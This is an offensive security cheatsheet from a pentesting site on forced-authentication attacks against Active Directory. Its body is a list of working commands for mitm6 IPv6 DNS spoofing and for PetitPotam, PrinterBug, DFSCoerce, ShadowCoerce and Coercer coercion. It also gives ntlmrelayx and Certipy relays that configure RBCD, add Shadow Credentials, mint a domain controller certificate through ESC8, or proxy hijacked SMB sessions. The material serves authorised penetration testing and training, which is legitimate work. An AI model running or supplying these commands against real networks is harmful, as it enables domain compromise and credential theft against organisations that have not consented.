← All Cheatsheets
active-directory

Coercion & mitm6 — Forced Authentication

Force machine accounts to authenticate to you and relay it — PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, Coercer and mitm6, paired with ntlmrelayx / Certipy relay (RBCD, Shadow Credentials, ESC8).

1 views Jun 2026 lazyhackers
mitm6 — IPv6 DNS Takeover (5)
mitm6 -d corp.local -i eth0
Spoof DHCPv6 to become the network's IPv6 DNS server (WPAD/auth capture)
mitm6 ipv6 dns
mitm6 -d corp.local --ignore-nofqdn
Only answer FQDN queries for the target domain — quieter, less breakage
mitm6 opsec
mitm6 -d corp.local -hw victim-host
Restrict spoofing to a single victim host (targeted)
mitm6 targeted
impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --delegate-access
Relay the IPv6/WPAD-captured machine auth to LDAPS → configure RBCD
mitm6 relay rbcd
impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --add-computer
Relay → add a new computer account (then use it for RBCD)
mitm6 relay addcomputer
PetitPotam — MS-EFSRPC (3)
python3 PetitPotam.py 10.10.14.1 10.10.10.1
Unauthenticated EFSRPC coercion (unpatched DCs) — listener then target
petitpotam efsrpc unauth
python3 PetitPotam.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
Authenticated coercion (patched DCs require valid creds)
petitpotam auth
python3 PetitPotam.py -pipe lsarpc 10.10.14.1 10.10.10.1
Try an alternate named pipe if efsrpc is filtered
petitpotam pipe
PrinterBug — MS-RPRN (Spooler) (3)
printerbug.py corp.local/user:[email protected] 10.10.14.1
Abuse the Print Spooler RPC to coerce the target to auth to your listener
printerbug msrprn spooler
dementor.py 10.10.14.1 10.10.10.1 -u user -p Password123 -d corp.local
Alternative SpoolSample/PrinterBug trigger
printerbug dementor
rpcdump.py @10.10.10.1 | grep -i spool
Check whether the MS-RPRN (Spooler) interface is exposed first
enum spooler
DFSCoerce / ShadowCoerce (2)
dfscoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
MS-DFSNM coercion — works even when the Spooler is disabled
dfscoerce msdfsnm
shadowcoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
MS-FSRVP (VSS) coercion — another no-Spooler path
shadowcoerce msfsrvp
Coercer — All-in-One (3)
coercer scan -u user -p Password123 -d corp.local -t 10.10.10.1
Enumerate which coercion methods/pipes the target actually exposes
coercer scan
coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1
Fire every available coercion method at the target at once
coercer coerce
coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1 --filter-method-name EfsRpcOpenFileRaw
Trigger one specific RPC method only
coercer filter
Relay Combos (where the coerced auth goes) (4)
impacket-ntlmrelayx -t ldaps://dc01.corp.local --delegate-access -smb2support
Relay coerced machine auth to LDAPS → grant RBCD over the victim computer
relay rbcd ldap
impacket-ntlmrelayx -t ldaps://dc01.corp.local --shadow-credentials --shadow-target "DC01$"
Relay → add Shadow Credentials (msDS-KeyCredentialLink) on the DC
relay shadowcreds
certipy relay -target http://ca.corp.local -template DomainController
ESC8 — relay coerced DC$ auth to AD CS web enrollment to mint a DC cert
relay adcs esc8
impacket-ntlmrelayx -t smb://10.10.10.1 -smb2support -socks
Relay to SMB and stash the session in a SOCKS proxy for reuse
relay smb socks

Related Articles

5
Active Directory

ADCS Attacks (ESC1–ESC16)

AD CS is the quietest road to Domain Admin: one mis-set checkbox on a certificate template…

23m read
Active Directory

Active Directory Attacks

Deep dive into Active Directory attack techniques — Kerberoasting, AS-REP Roasting, Pass-t…

14m read
Network Security

Wireshark for Security Professionals

Master Wireshark for security work — capture and display filters, protocol dissection, det…

12m read
Active Directory

Golden Ticket Attack — Complete Guide

Golden Ticket Attack Complete Guide: Kerberos Exploitation in Active Directory | LazyHack…

27m read
Active Directory

CPTS Exam Walkthrough

A complete, sanitised CPTS-style walkthrough — two trusted Active Directory forests compro…

31m read

Related Courses

3
⭐ Premium
Intermediate

Network Penetration Testing

From host discovery to Active Directory attacks

3 · 8.2h
Beginner

Networking Fundamentals for Pentesters

Understand how networks actually work — so you can break them. TCP/IP, routing, protocols,…

1 · 5.9h
⭐ Premium
Intermediate

Windows Privilege Escalation — Complete Course

From whoami /priv to NT AUTHORITY\SYSTEM — every technique, tool, and HTB/THM/PG practice …

1 · 8.0h